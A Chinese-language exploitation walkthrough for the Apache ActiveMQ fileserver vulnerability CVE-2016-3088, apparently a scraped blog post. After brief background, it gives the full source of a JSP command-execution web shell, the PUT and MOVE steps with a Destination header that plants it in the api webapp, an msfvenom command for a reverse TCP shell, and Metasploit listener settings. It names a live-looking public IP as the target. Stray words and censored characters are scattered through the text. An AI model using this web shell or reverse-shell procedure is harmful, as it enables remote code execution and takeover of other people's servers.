简介:2016年4月14日,国外安全研究人员 Simon Zuckerbraun 曝光 Apache ActiveMQ Fileserver 存在多个安全漏洞,可以使远程***者用恶意代码替代Web应用,在受影响系统上执行远程代码(CVE-2016-3088)。 8161端口为web控制台端口,本漏洞就出如今web控制台中。 ActiveMQ的web控制台分三个应用,admin、api和fileserver,其中admin是管理员页面,api是接口,fileserver是储存文件的接口;admin和api都须要登陆后才能使用,fileserver无需登陆。 fileserver是一个RESTful API接口,咱们能够经过GET、PUT、DELETE等HTTP请求对其中存储的文件进行读写操做,其设计目的是为了弥补消息队列操做不能传输、存储二进制文件的缺陷,但后来发现:其使用率并不高并且文件操做容易出现漏洞。 因此,ActiveMQ在5.12.x~5.13.x版本中,已经默认关闭了fileserver这个应用(你能够conf/jetty.xml中开启之);在5.14.0版本之后,完全删除了fileserver应用。
方法1.直接写shell
访问http://120.79.1.70:8161/fileserver 直接用bp拦截以后把post改为put 在日后面加几行java
<%@ page import="java.util.*,java.io.*"%> <% %> <HTML><BODY> <FORM METHOD="GET" NAME="comments" ACTION=""> <INPUT TYPE="text" NAME="comment"> <INPUT TYPE="submit" VALUE="Send"> </FORM> <pre> <% if ( request.getParameter( "comment" ) != null ) { out.println( "Command: " + request.getParameter( "comment" ) + "<BR>" ); Process p = Runtime.getRuntime().exec( request.getParameter( "comment" ) ); OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream( in ); String disr = dis.readLine(); while ( disr != null ) { out.println( disr ); disr = dis.readLine(); } } %> </pre> </BODY></HTML>
以下图:chen.txt:web
返回204表明成功,以后再把put改为move 后面再加一行shell
Destination:file:///opt/activemq/webapps/api/s.jsp
最后直接访问 后面加一个api就成功了api
方法2.利用 cron 定时任务写 shell
如今kali里面生成一个***
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.199.109 LPORT=9999 r> bing.jsp
再把他上传到桌面进行打开以下图:安全
以后和以前同样 在第一行的后面添加一行app
Destination:file:///opt/activemq/webapps/api/s.jsp
到网站上进行查看有没有webapp
以后打开kali jsp
use exploit/multi/handler set payload java/jsp_shell_reverse_tcp set lhost 192.168.199.109 set lport 9999 run
进行监听就成功了!tcp